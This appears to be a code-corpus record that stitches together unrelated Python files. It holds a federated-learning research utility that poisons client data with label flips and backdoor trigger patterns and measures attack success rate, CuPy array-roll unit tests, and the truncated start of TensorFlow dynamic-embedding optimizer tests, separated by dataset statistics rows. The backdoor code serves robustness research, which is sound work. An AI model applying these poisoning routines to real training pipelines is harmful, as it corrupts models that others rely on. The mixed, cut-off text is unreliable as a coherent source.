x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if i in cor_local_idx:
val_cnt = 0
for j in cor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
if mode == 1:
y_info[corrupted_idx] = cor_vals[val_cnt]
val_cnt = val_cnt + 1
else:
for i in corrupted_idx:
temp_x = temp
ori_val = y_info[i].item()
temp_x.difference_update([ori_val])
y_info[i] = random.sample(temp_x, 1)[0]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _create_backdoor_subsamples(sample_dict, x_data, y_data, x_name, y_name,
cor_label_idx, target_label, cor_local_ratio=1.0, cor_data_ratio=0.5, dataset='mnist'):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
# len(sample_dict) is a number of client
for i in range(len(sample_dict)):
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
y_info = y_data[indices]
if i in cor_local_idx:
for j in cor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset=='mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset=='fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset=='cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
if torch.cuda.is_available():
x_info = x_info.cuda()
y_info = y_info.cuda()
x_data_dict.update({xname: x_info})
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _create_backdoor_subsamples2(sample_dict, x_data, y_data, x_name, y_name,
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5, dataset='mnist'):
x_data_dict = dict()
y_data_dict = dict()
num_of_label = len(set(y_data.tolist()))
major_cnt = 0
minor_cnt = 0
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
y_info = y_data[indices]
temp_label_idx = cor_label_idx.copy()
if i in cor_local_idx:
cor_major_label_idx = list()
cor_major_label_idx.append(i)
cor_major_label_idx.append((i + 5) % num_of_label)
for j in cor_major_label_idx:
if j in temp_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_major_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset == 'mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset == 'fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset == 'cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
major_cnt += 1
temp_label_idx.remove(j)
for j in temp_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_minor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset == 'mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset=='fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset == 'cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
minor_cnt += 1
if torch.cuda.is_available():
x_info = x_info.cuda()
y_info = y_info.cuda()
x_data_dict.update({xname: x_info})
y_data_dict.update({yname: y_info})
print('backdoor cnt:', major_cnt, minor_cnt)
print('cor_label_idx:', cor_label_idx)
print('')
return x_data_dict, y_data_dict
def _create_corrupted_subsamples2(sample_dict, x_data, y_data, x_name, y_name,
cor_local_ratio=1.0, cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5,
mode=1):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
num_of_label = len(set(y_data.tolist()))
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if i in cor_local_idx:
cor_major_label_idx = list()
cor_major_label_idx.append(i)
cor_major_label_idx.append((i + 5) % num_of_label)
for j in cor_major_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_major_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
ori_val = y_info[corrupted_idx][0]
y_info[corrupted_idx] = (ori_val + 5) % num_of_label
temp = set(y_data.tolist())
temp.difference_update(cor_major_label_idx)
cor_minor_label_idx = random.sample(temp, cor_minor_label_cnt)
temp.difference_update(cor_minor_label_idx)
cor_minor_vals = random.sample(temp, cor_minor_label_cnt)
print(cor_major_label_idx, '|', cor_minor_label_idx, '->', cor_minor_vals)
val_cnt = 0
for j in cor_minor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_minor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
if mode == 1:
y_info[corrupted_idx] = cor_minor_vals[val_cnt]
val_cnt = val_cnt + 1
else:
cor_minor_vals = list()
for i in corrupted_idx:
temp_x = temp
ori_val = y_info[i].item()
temp_x.difference_update([ori_val])
y_info[i] = random.sample(temp_x, 1)[0]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict=None, y_val_dict=None):
sum = 0
print('[*] Train Dataset (x, y)')
for idx, (x_key, y_key) in enumerate(zip(x_train_dict, y_train_dict)):
sum += len(x_train_dict[x_key])
print('- sample{}: {}, {}'.format(idx, len(x_train_dict[x_key]), len(y_train_dict[y_key])))
print(': ', end='')
for i in range(10):
print(y_train_dict[y_key].tolist().count(i), end=' ')
print('')
print('# total:', sum, end='\n\n')
sum = 0
print('[*] Test Dataset (x, y)')
for idx, (x_key, y_key) in enumerate(zip(x_test_dict, y_test_dict)):
sum += len(x_test_dict[x_key])
print('- sample{}: {}, {}'.format(idx, len(x_test_dict[x_key]), len(y_test_dict[y_key])))
print(': ', end='')
for i in range(10):
print(y_test_dict[y_key].tolist().count(i), end=' ')
print('')
print('# total:', sum, end='\n\n')
if x_val_dict is not None:
sum = 0
print('[*] Valid Dataset (x, y)')
for idx, (x_key, y_key) in enumerate(zip(x_val_dict, y_val_dict)):
sum += len(x_val_dict[x_key])
print('- sample{}: {}, {}'.format(idx, len(x_val_dict[x_key]), len(y_val_dict[y_key])))
print(': ', end='')
for i in range(10):
print(y_val_dict[y_key].tolist().count(i), end=' ')
print('')
print('# total:', sum, end='\n\n')
def _load_data(path='../data/mnist.pkl.gz', seed=1, torch_tensor=True, pre_train=False):
data_path = Path(path)
with gzip.open(data_path, "rb") as f:
((x_train, y_train), (x_test, y_test)) = pickle.load(f)
if pre_train:
pre_rate = 0.05
train_size = len(x_train)
pre_data_size = int(train_size * pre_rate)
np.random.seed(seed)
shuffled_indices = np.random.permutation(train_size)
pre_indices = shuffled_indices[:pre_data_size]
tr_indices = shuffled_indices[pre_data_size:]
x_pre_train = x_train[pre_indices]
y_pre_train = y_train[pre_indices]
x_train = x_train[tr_indices]
y_train = y_train[tr_indices]
if torch_tensor:
x_train, y_train, x_test, y_test, x_pre_train, y_pre_train =\
map(torch.tensor, (x_train, y_train, x_test, y_test, x_pre_train, y_pre_train))
return x_train, y_train, x_test, y_test, x_pre_train, y_pre_train
else:
if torch_tensor:
x_train, y_train, x_test, y_test = map(torch.tensor, (x_train, y_train, x_test, y_test))
return x_train, y_train, x_test, y_test, None, None
def load_data(data='mnist', seed=1, torch_tensor=True, pre_train=False):
if data=='mnist' or data=='fmnist':
path='../data/' + data + '.pkl.gz'
tr_X, tr_y, te_X, te_y, pre_X, pre_y = _load_data(path, seed, torch_tensor, pre_train)
if pre_train:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape, pre_X.shape, pre_y.shape)
else:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape)
return tr_X, tr_y, te_X, te_y, pre_X, pre_y
elif data=='cifar10':
path = '../data/cifar10.pkl.gz'
tr_X, tr_y, te_X, te_y, pre_X, pre_y = _load_data(path, seed, torch_tensor, pre_train)
tr_X = np.transpose(tr_X, (0, 3, 1, 2))
te_X = np.transpose(te_X, (0, 3, 1, 2))
tr_y = torch.tensor(tr_y.detach().clone().reshape(-1), dtype=torch.int64)
te_y = torch.tensor(te_y.detach().clone().reshape(-1), dtype=torch.int64)
if pre_train:
pre_X = np.transpose(te_X, (0, 3, 1, 2))
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape, pre_X.shape, pre_y.shape)
else:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape)
return tr_X, tr_y, te_X, te_y, pre_X, pre_y
else:
print('Please check the data name!:', data)
return None, None, None, None, None, None
def create_non_iid_samples(x_train, y_train, x_test, y_test,
num_of_sample=10, pdist=0.6, seed=1, verbose=True):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
x_train_dict, y_train_dict = _create_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train')
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_corrupted_non_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0,
cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5, mode=1,
num_of_sample=10, pdist=0.6, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
x_train_dict, y_train_dict = _create_corrupted_subsamples2(sample_dict_train, x_train, y_train,
'x_train', 'y_train',
cor_local_ratio, cor_minor_label_cnt,
cor_major_data_ratio,
cor_minor_data_ratio, mode)
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test, 'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_backdoor_non_iid_samples(x_train, y_train, x_test, y_test, target_label,
cor_local_ratio=1.0,
cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5,
num_of_sample=10, pdist=0.6, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
num_of_local = len(sample_dict_train)
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
num_of_label = len(set(y_train.tolist()))
while(True):
cor_label_idx = random.sample(range(0, num_of_label), cor_minor_label_cnt)
if not target_label in cor_label_idx:
break
print('[*] Corrupted Label')
print(cor_label_idx, '->', target_label)
print('')
x_train_dict, y_train_dict = _create_backdoor_subsamples2(sample_dict_train, x_train, y_train, 'x_train', 'y_train',
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio, cor_minor_data_ratio, dataset)
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test, 'x_test', 'y_test')
x_val_dict, y_val_dict = _create_backdoor_subsamples2(sample_dict_test, x_test, y_test, 'x_val', 'y_val',
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio, cor_minor_data_ratio, dataset)
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict
def create_iid_samples(x_train, y_train, x_test, y_test, num_of_sample=10, seed=1, verbose=True):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
x_train_dict, y_train_dict = _create_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train')
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_corrupted_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=1,
num_of_sample=10, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
x_train_dict, y_train_dict = _create_corrupted_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train',
cor_local_ratio, cor_label_ratio,
cor_data_ratio, mode)
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_backdoor_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, target_label=1,
num_of_sample=10, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_iid_subsamples_indices(y_train, num_of_sample, seed)
num_of_label = len(set(y_train.tolist()))
while(True):
cor_label_idx = random.sample(range(0, num_of_label), int(num_of_label * cor_label_ratio))
if not target_label in cor_label_idx:
break
# temp = set(y_train.tolist())
# temp.difference_update(cor_label_idx)
print('[*] Corrupted Label')
print(cor_label_idx, '->', target_label)
print('')
x_train_dict, y_train_dict = _create_backdoor_subsamples(sample_dict_train, x_train, y_train, 'x_train', 'y_train',
cor_label_idx, target_label,
cor_local_ratio, cor_data_ratio, dataset)
sample_dict_test = _get_iid_subsamples_indices(y_test, num_of_sample, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
x_val_dict, y_val_dict = _create_backdoor_subsamples(sample_dict_test, x_test, y_test, 'x_val', 'y_val',
cor_label_idx, target_label,
cor_local_ratio, cor_data_ratio, dataset)
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict, y_val_dict
def create_dataloader(x_train, y_train, x_test, y_test, batch_size, dataset='mnist'):
train_data = None
test_data = None
if dataset=='mnist':
if x_train != None and y_train != None:
train_data = DataLoader(TensorDataset(x_train, y_train), batch_size=batch_size, shuffle=True)
if x_test != None and y_test != None:
test_data = DataLoader(TensorDataset(x_test, y_test), batch_size=1)
elif dataset=='fmnist':
workers=4
transform = transforms.Compose([transforms.ToPILImage(), transforms.Resize((35, 35)), transforms.ToTensor()])
if x_train != None and y_train != None:
train_dataset = CustomTensorDataset(tensors=(x_train, y_train), transform=transform)
train_data = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size, shuffle=True,
# num_workers=workers, pin_memory=True
)
if x_test != None and y_test != None:
test_dataset = CustomTensorDataset(tensors=(x_test, y_test), transform=transform)
test_data = torch.utils.data.DataLoader(test_dataset,
batch_size=batch_size, shuffle=False,
# num_workers=workers, pin_memory=True
)
elif dataset=='cifar10':
workers=4
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_transform = transforms.Compose([transforms.ToPILImage(),
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, 4),
transforms.ToTensor(),
normalize
])
test_transform = transforms.Compose([transforms.ToPILImage(), transforms.ToTensor(),
normalize
])
if x_train != None and y_train != None:
train_dataset = CustomTensorDataset(tensors=(x_train, y_train), transform=train_transform)
train_data = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size, shuffle=True,
# num_workers=workers, pin_memory=True
)
if x_test != None and y_test != None:
test_dataset = CustomTensorDataset(tensors=(x_test, y_test), transform=test_transform)
test_data = torch.utils.data.DataLoader(test_dataset,
batch_size=batch_size, shuffle=False,
# num_workers=workers, pin_memory=True
)
return train_data, test_data
def cal_entropy(data):
return entropy(data, base=len(data))
def cal_asr(model, test_y_dict, valid_X_dict, valid_y_dict, target_label, dataset='mnist'):
s_cnt = 0
t_cnt = 0
for i, (y, v_x, v_y) in enumerate(zip(test_y_dict, valid_X_dict, valid_y_dict)):
te_y = test_y_dict[y]
val_X = valid_X_dict[v_x].float()
val_y = valid_y_dict[v_y]
if dataset == 'cifar10':
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transform = transforms.Compose([
transforms.ToPILImage(),
transforms.ToTensor(),
normalize
])
val_dataset = CustomTensorDataset(tensors=(val_X, val_y), transform=test_transform)
val_data = torch.utils.data.DataLoader(val_dataset,
batch_size=len(val_X), shuffle=False)
val_X = next(iter(val_data))[0]
val_y = next(iter(val_data))[1]
elif dataset == 'fmnist':
transform = transforms.Compose(
[transforms.ToPILImage(), transforms.Resize((35, 35)), transforms.ToTensor()])
val_dataset = CustomTensorDataset(tensors=(val_X, val_y), transform=transform)
val_data = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_X), shuffle=False)
val_X = next(iter(val_data))[0]
val_y = next(iter(val_data))[1]
if use_cuda:
val_X = val_X.float().cuda()
val_y = val_y.cuda()
pred_val_y = model(val_X).argmax(dim=1)
for idx in range(len(te_y)):
if te_y[idx] != val_y[idx]:
if int(pred_val_y[idx]) == target_label:
s_cnt += 1
t_cnt += 1
if t_cnt == 0:
asr = 0.0
else:
asr = float(float(s_cnt) / float(t_cnt))
print('\n- Attack Success Rate: {} ({}/{})'.format(asr, s_cnt, t_cnt))
return asr
def adjust_learning_rate(lr, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 2 every 30 epochs"""
new_lr = lr * (0.5 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = new_lr
def arg_parse():
def _str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', '-d', default='mnist', dest='dataset',
help='Dataset [mnist|fmnist|cifar10]')
parser.add_argument('--model', '-m', default=['central', 'federate'], dest='model', nargs='*',
help='Model list [central, federate]')
parser.add_argument('--corrupt', '-c', default='True', dest='corrupt',
help='Data Corruption [True|False]')
dataset = parser.parse_args().dataset
model = parser.parse_args().model
corrupt = parser.parse_args().corrupt
corrupt = _str2bool(corrupt)
return dataset, model, not corrupt, not corrupt
if __name__=='__main__':
tr_X, tr_y, te_X, te_y = load_mnist_data()
tr_X_iid_dict, tr_y_iid_dict, te_X_iid_dict, te_y_iid_dict = create_corrupted_iid_samples(
tr_X, tr_y, te_X, te_y,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=2,
num_of_sample=10, seed=1, verbose=True
)
tr_X_iid_dict, tr_y_iid_dict, te_X_iid_dict, te_y_iid_dict = create_corrupted_non_iid_samples(
tr_X, tr_y, te_X, te_y,
cor_local_ratio=1.0,
cor_minor_label_cnt=1,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5, mode=1,
num_of_sample=10, seed=1, verbose=True
) | 41.660976 | 120 | 0.580938 | 4,755 | 34,162 | 3.797056 | 0.058885 | 0.021933 | 0.018887 | 0.01717 | 0.800111 | 0.782941 | 0.763334 | 0.748602 | 0.720354 | 0.670728 | 0 | 0.015375 | 0.312716 | 34,162 | 820 | 121 | 41.660976 | 0.75361 | 0.020813 | 0 | 0.596244 | 0 | 0 | 0.031336 | 0.001317 | 0 | 0 | 0 | 0 | 0.001565 | 1 | 0.045383 | false | 0 | 0.025039 | 0.00313 | 0.118936 | 0.070423 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7ce52680d9619a5b3e700fbcba33dbc0c5505c46 | 2,157 | py | Python | tests/cupy_tests/manipulation_tests/test_rearrange.py | PhysicsTeacher13/CHAINER | 64018f7c6956c8ea42220e2e4bd55f7ff30df097 | [
"BSD-3-Clause"
] | null | null | null | tests/cupy_tests/manipulation_tests/test_rearrange.py | PhysicsTeacher13/CHAINER | 64018f7c6956c8ea42220e2e4bd55f7ff30df097 | [
"BSD-3-Clause"
] | null | null | null | tests/cupy_tests/manipulation_tests/test_rearrange.py | PhysicsTeacher13/CHAINER | 64018f7c6956c8ea42220e2e4bd55f7ff30df097 | [
"BSD-3-Clause"
] | null | null | null | import unittest
from cupy import testing
@testing.gpu
class TestRearrange(unittest.TestCase):
_multiprocess_can_split_ = True
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal(accept_error=TypeError)
def test_roll(self, xp, dtype):
x = xp.arange(10, dtype)
return xp.roll(x, 2)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll2(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 1)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_negative(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, -2)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_with_axis(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 1, axis=0)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_with_negative_axis(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 1, axis=-1)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_double_shift(self, xp, dtype):
x = testing.shaped_arange((10,), xp, dtype)
return xp.roll(x, 35)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_double_shift_with_axis(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 11, axis=0)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_roll_zero_array(self, xp, dtype):
x = testing.shaped_arange((), xp, dtype)
return xp.roll(x, 5)
@testing.for_all_dtypes()
@testing.numpy_cupy_raises()
def test_roll_invalid_axis(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 1, axis=2)
@testing.for_all_dtypes()
@testing.numpy_cupy_raises()
def test_roll_invalid_negative_axis(self, xp, dtype):
x = testing.shaped_arange((5, 2), xp, dtype)
return xp.roll(x, 1, axis=-3)
| 30.814286 | 59 | 0.658322 | 320 | 2,157 | 4.153125 | 0.153125 | 0.100075 | 0.097818 | 0.142965 | 0.860045 | 0.860045 | 0.829947 | 0.783296 | 0.782543 | 0.748683 | 0 | 0.021226 | 0.213723 | 2,157 | 69 | 60 | 31.26087 | 0.762382 | 0 | 0 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.036364 | 0 | 0.436364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b1820d795ebbfe09ad0fbd7414a730c5492a548 | 48,885 | py | Python | tensorflow_recommenders_addons/dynamic_embedding/python/kernel_tests/dynamic_embedding_optimizer_test.py | yuanqingsunny/recommenders-addons | 7fe0e213ff59fe3528e7c1877a3885cc7ca355d4 | [
"Apache-2.0"
] | 1 | 2021-07-02T07:05:54.000Z | 2021-07-02T07:05:54.000Z | tensorflow_recommenders_addons/dynamic_embedding/python/kernel_tests/dynamic_embedding_optimizer_test.py | xidianw3/recommenders-addons | da08e1e8c315838d901e93f15720318a7bd188fa | [
"Apache-2.0"
] | null | null | null | tensorflow_recommenders_addons/dynamic_embedding/python/kernel_tests/dynamic_embedding_optimizer_test.py | xidianw3/recommenders-addons | da08e1e8c315838d901e93f15720318a7bd188fa | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""unit tests of dynamic embedding ops
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import itertools
import numpy as np
import os
import tensorflow as tf
from tensorflow_recommenders_addons import dynamic_embedding as de
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.keras import optimizer_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adadelta
from tensorflow.python.training import adagrad
from tensorflow.python.training import adagrad_da
from tensorflow.python.training import adam
from tensorflow.python.training import ftrl
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import momentum
from tensorflow.python.training import monitored_session
from tensorflow.python.training import proximal_adagrad
from tensorflow.python.training import proximal_gradient_descent as pgd
from tensorflow.python.training import rmsprop
from tensorflow.python.training import training_util
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
def _type_converter(tf_type):
mapper = {
dtypes.int32: np.int32,
dtypes.int64: np.int64,
dtypes.float32: np.float,
dtypes.float64: np.float64,
}
return mapper[tf_type]
def _get_devices():
return ["/gpu:0" if test_util.is_gpu_available() else "/cpu:0"]
def _check_device(op, expexted_device="gpu"):
return expexted_device.upper() in op.device
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob("%s/*" % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
default_config = config_pb2.ConfigProto(
allow_soft_placement=False,
gpu_options=config_pb2.GPUOptions(allow_growth=True))
class CommonTrainableTestV1Base(object):
def common_minimize_trainable(self, base_opt, test_opt, name):
raise NotImplementedError
def device_check(self, de):
if test_util.is_gpu_available():
self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())
@test_util.deprecated_graph_mode_only
def test_adadelta_minimize_trainable(self):
base_opt = adadelta.AdadeltaOptimizer(1.0)
test_opt = adadelta.AdadeltaOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="adadelta")
@test_util.deprecated_graph_mode_only
def test_adagrad_minimize_trainable(self):
base_opt = adagrad.AdagradOptimizer(1.0)
test_opt = adagrad.AdagradOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="adagrad")
@test_util.deprecated_graph_mode_only
def test_adagradda_minimize_trainable(self):
base_gs = training_util.create_global_step()
base_opt = adagrad_da.AdagradDAOptimizer(1.0, base_gs)
test_opt = adagrad_da.AdagradDAOptimizer(1.0, base_gs)
self.common_minimize_trainable(base_opt, test_opt, name="adagrad_da")
@test_util.deprecated_graph_mode_only
def test_ftrl_minimize_trainable(self):
base_opt = ftrl.FtrlOptimizer(1.0)
test_opt = ftrl.FtrlOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="ftrl")
@test_util.deprecated_graph_mode_only
def test_proximal_adagrad_minimize_trainable(self):
base_opt = proximal_adagrad.ProximalAdagradOptimizer(1.0)
test_opt = proximal_adagrad.ProximalAdagradOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="proximal_adagrad")
@test_util.deprecated_graph_mode_only
def test_proximalsgd_minimize_trainable(self):
base_opt = pgd.ProximalGradientDescentOptimizer(1.0)
test_opt = pgd.ProximalGradientDescentOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="proximal_sgd")
@test_util.deprecated_graph_mode_only
def test_momentum_minimize_trainable(self):
base_opt = momentum.MomentumOptimizer(1.0, momentum=0.9)
